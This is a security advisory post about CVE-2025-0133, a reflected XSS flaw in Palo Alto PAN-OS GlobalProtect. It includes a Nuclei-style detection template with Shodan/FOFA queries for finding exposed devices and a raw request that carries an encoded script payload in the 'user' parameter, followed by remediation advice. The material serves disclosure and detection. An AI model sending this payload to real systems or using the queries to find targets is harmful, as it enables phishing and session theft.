CVE-2025-0133 Published: August 05, 2025

Palo Alto PAN-OS Reflected XSS Vulnerability MEDIUM SEVERITY

A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect™ gateway and portal features of Palo Alto Networks PAN-OS® software enables execution of malicious JavaScript in the context of an authenticated Captive Portal user's browser when they click on a specially crafted link. The primary risk is phishing attacks that can lead to credential theft—particularly if you enabled Clientless VPN.

Proof of Concept

The vulnerability resides in a parameter exposed by the GlobalProtect or WebGUI endpoint, where user input was not adequately sanitized before being reflected in the HTML response.

Step 1: Trigger the XSS Payload

A malicious actor can trigger the reflected XSS by crafting the following HTTP request:

id: CVE-2025-0133
info:
  name: PAN-OS - Reflected Cross-Site Scripting  
  metadata:
    verified: true
    max-request: 1
    shodan-query:
      - http.favicon.hash:"-631559155"
      - cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
    fofa-query: icon_hash="-631559155"
    product: pan-os
    vendor: paloaltonetworks

http:
  - raw:
      - |
        GET /ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>prompt("XSS")</script>'
          - 'authentication cookie'
        condition: and

      - type: status
        status:
          - 200

Step 2: Confirm the Reflection

If the payload appears in the response body unencoded, this confirms the target is vulnerable. The request does not require authentication, which makes it more impactful on publicly exposed interfaces.

Vulnerable Instance

When the PAN-OS instance is vulnerable, the script will execute in the victim's browser, potentially stealing session tokens or executing administrative actions.

Remediation

Palo Alto has released patches and hotfixes addressing this vulnerability across PAN-OS versions:

All users are advised to upgrade to the latest available version and ensure the web interface is not exposed directly to the internet.

Patch guidance and advisory: https://security.paloaltonetworks.com/CVE-2025-0133

References

Closing Words

Our team at Zerosek continues to monitor emerging threats and respond with detection tools, coordinated disclosures, and remediation guidance. As part of our commitment to securing the external attack surface, we rapidly track CVEs like CVE-2025-0133 and provide clients with immediate actionable insights.